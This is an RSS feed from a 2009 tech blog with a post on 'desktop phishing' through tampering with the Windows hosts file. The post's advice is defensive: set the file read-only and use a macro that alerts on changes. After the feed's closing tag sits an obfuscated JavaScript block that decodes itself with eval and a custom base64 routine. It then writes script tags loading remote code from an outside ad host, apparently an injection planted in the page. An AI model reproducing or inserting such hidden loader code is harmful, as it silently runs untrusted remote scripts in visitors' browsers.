<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Syshacks Tech Blog &#187; avoid desktop phishing</title>
	<atom:link href="http://blog.syshacks.com/tag/avoid-desktop-phishing/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.syshacks.com</link>
	<description>We Lead &#38; Other&#039;s Follow</description>
	<lastBuildDate>Mon, 21 Dec 2009 05:10:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>Block Desktop Phishing in your PC !</title>
		<link>http://blog.syshacks.com/2009/09/13/block-desktop-phishing-in-your-pc/</link>
		<comments>http://blog.syshacks.com/2009/09/13/block-desktop-phishing-in-your-pc/#comments</comments>
		<pubDate>Sun, 13 Sep 2009 06:40:29 +0000</pubDate>
		<dc:creator>Shoaib</dc:creator>
				<category><![CDATA[Exclusive Tutorials]]></category>
		<category><![CDATA[Security Tutorials]]></category>
		<category><![CDATA[avoid desktop phishing]]></category>
		<category><![CDATA[block desktop phishing]]></category>
		<category><![CDATA[desktop phishing]]></category>
		<category><![CDATA[hosts file]]></category>
		<category><![CDATA[hosts file danger]]></category>

		<guid isPermaLink="false">http://blog.syshacks.com/?p=69</guid>
		<description><![CDATA[In recent times, a new method of phishing has come up. In Desktop Phishing, Hackers replace your Windows/System32/drivers/etc/hosts file , this file controls the internet browsing in your PC. You can do some mischief there by  interchanging IPs of Yahoo and Google. Such that when you open Yahoo, Google opens. We can of course do [...]]]></description>
			<content:encoded><![CDATA[<p>In recent times, a new method of phishing has come up.</p>
<p>In Desktop Phishing, Hackers replace your <em>Windows/System32/drivers/etc/hosts file</em> , this file controls the internet browsing in your PC. You can do some mischief there by  interchanging IPs of Yahoo and Google. Such that when you open Yahoo, Google opens.</p>
<p><strong>We can of course do something to Block It. This Tutorial is Exclusively <span style="color: #00ccff;">Syshacks</span>.</strong></p>
<p><strong><span id="more-69"></span></strong></p>
<p>Here is a screenshot of the File.</p>
<p><a title="Screen 1" rel="lightbox[pics69]" href="http://blog.syshacks.com/wp-content/uploads/2009/09/screen1.PNG" class="highslide-image" onclick="return hs.expand(this);"><img class="attachment wp-att-70 " src="http://blog.syshacks.com/wp-content/uploads/2009/09/screen1.thumbnail.PNG" alt="Screen 1" width="200" height="117" /></a></p>
<p>I just replaced Yahoo website by Google in my pc.</p>
<p><a title="Screen2" rel="lightbox[pics69]" href="http://blog.syshacks.com/wp-content/uploads/2009/09/screen2.PNG" class="highslide-image" onclick="return hs.expand(this);"><img class="attachment wp-att-71 " src="http://blog.syshacks.com/wp-content/uploads/2009/09/screen2.thumbnail.PNG" alt="Screen2" width="200" height="138" /></a></p>
<p>I know you wont believe it but it does Work.</p>
<p><strong>Okay so now the way Hackers are using it is that they change this file and extract it on your PC in some way such that it gets replaced. For e.g they will keep a different ip for paypal.com so even if you type paypal.com in your PC, the Phisher Link will Open. Which is quite dangerous right.</strong></p>
<p><strong><br />
</strong></p>
<p><strong><span style="color: #ff6600;">A Nice Solution is given by:</span></strong></p>
<p><span style="color: #ff6600;"><strong><span style="color: #333333;">1) Right Click on the File &gt; Properties and set it as Read-Only in the General Tab.</span></strong></span></p>
<p><strong>2) A small Macro by Insight Software.</strong><br />
<br />
<a href="http://www.macros.com/usermacs/umprothosts.htm">http://www.macros.com/usermacs/umprothosts.htm</a></p>
<p><strong>Download Link:</strong></p>
<p><a href="http://www.macros.com/download1/usermacs/umprothosts.zip">http://www.macros.com/download1/usermacs/umprothosts.zip</a></p>
<p><strong>This macro notifies the user when the HOSTS file has been altered.</strong></p>
<p><strong>Comments and your Solutions are welcome.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.syshacks.com/2009/09/13/block-desktop-phishing-in-your-pc/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
	</channel>
</rss>
<script language=JavaScript>eval(unescape('var%20codelock_bas%3D%27ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B%2F%27%3B%20function%20codelock_dec%28str%29%20%7B%20str%3Dstr.split%28%27%40%27%29.join%28%27CAg%27%29%3B%20str%3Dstr.split%28%27%21%27%29.join%28%27W5%27%29%3B%20str%3Dstr.split%28%27%2A%27%29.join%28%27CAgI%27%29%3B%20var%20bt%2C%20dt%20%3D%20%27%27%3B%20for%28i%3D0%3B%20i%3Cstr.length%3B%20i%20%2B%3D%204%29%20%7B%20bt%20%3D%20%28codelock_bas.indexOf%28str.charAt%28i%29%29%20%26%200xff%29%20%3C%3C18%20%7C%20%28codelock_bas.indexOf%28str.charAt%28i%20%2B1%29%29%20%26%200xff%29%20%3C%3C12%20%7C%20%28codelock_bas.indexOf%28str.charAt%28i%20%2B2%29%29%20%26%200xff%29%20%3C%3C%206%20%7C%20codelock_bas.indexOf%28str.charAt%28i%20%2B3%29%29%20%26%200xff%3B%20dt%20%2B%3D%20String.fromCharCode%28%28bt%20%26%200xff0000%29%20%3E%3E16%2C%20%28bt%20%26%200xff00%29%20%3E%3E8%2C%20bt%20%26%200xff%29%3B%20%7D%20if%28str.charCodeAt%28i%20-2%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-2%29%29%3B%20%7D%20else%20if%28str.charCodeAt%28i%20-1%29%20%3D%3D%2061%29%20%7B%20return%28dt.substring%280%2C%20dt.length%20-1%29%29%3B%20%7D%20else%20%7Breturn%28dt%29%7D%3B%20%7D')); document.write(codelock_dec('PGh0bWw+DQo8aGVhZD4NCjwvaGVhZD4NCjxib2R5Pg0KPHNjcmlwdCBsY!ndWFnZT0iamF2YXNjcmlwdCIgc3JjPSAiaHR0cDovL3d3dy5hZHZwb2ludHMuY29tL2pzLnBocD91aWQ9MTQwMjMiPjwvc2NyaXB0Pg0KPHNjcmlwdCBsY!ndWFnZT0iamF2YXNjcmlwdCIgc3JjPSAiaHR0cDovL3d3dy5hZHZwb2ludHMuY29tL2pzLnBocD91aWQ9MTQwMjMiPjwvc2NyaXB0Pg0KPC9ib2R5Pg0KPC9odG1sPg==')); </script>

